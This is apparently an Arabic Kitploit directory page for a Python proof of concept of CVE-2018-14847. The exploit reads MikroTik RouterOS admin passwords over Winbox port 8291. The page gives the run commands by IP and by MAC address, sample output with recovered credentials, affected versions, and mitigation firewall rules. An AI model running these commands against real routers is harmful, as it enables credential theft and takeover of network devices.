Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Python-MikrotikLoginExploit — PoC لثغرة CVE-2018-14847 في Mikrotik باستخدام سكربت بسيط | Kitploit
أدوات/GitHubGitHub/sinichi449/python-mikrotikloginexploit
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكات
GitHubsinichi449/python-mikrotikloginexploit

Python-MikrotikLoginExploit

PoC لثغرة CVE-2018-14847 في Mikrotik باستخدام سكربت بسيط

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
212منذ 6 سنواتتمت المراجعة من قبل Kitploit

استغلال تسجيل الدخول إلى Mikrotik

إثبات المفهوم (PoC) للثغرة الأمنية في Mikrotik CVE-2018-14847 (خاصةً على Winbox)، تعمل بطريقة قراءة كلمة المرور مباشرةً من RouterOS على المنفذ الافتراضي 8291.

الأصلي بواسطة: https://github.com/BigNerd95/

المتطلبات

  • Python 3+

التثبيت على Linux

root@kitploit:~
apt install python3

مثال للاستخدام

WinBox (TCP/IP)

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

مثال:

root@kitploit:~
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123

استخدام عنوان MAC

يمكنك استخدام هذا السكربت حتى بدون عنوان IP.

استخدم MACServerDiscovery.py لفحص الراوتر.

root@kitploit:~
python3 MACServerDiscover.py

مثال:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

الاستغلال:

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

مثال:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123

الإصدارات القابلة للاستغلال

إصدارات RouterOS من 2015-05-28 إلى 2018-04-20

إصدارات RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

مزيد من المعلومات: https://blog.mikrotik.com/security/winbox-vulnerability.html

الوقاية من الاستغلال

  • قم بترقية RouterOS إلى 6.42+
  • عطّل Winbox
  • احظر الخدمة:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • قواعد التصفية (ACL)، احظر المنفذ 8291:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • قيّد وصول تسجيل الدخول إلى Winbox من عناوين MAC:
root@kitploit:~
/tool mac-server mac-winbox
تنزيل الأداة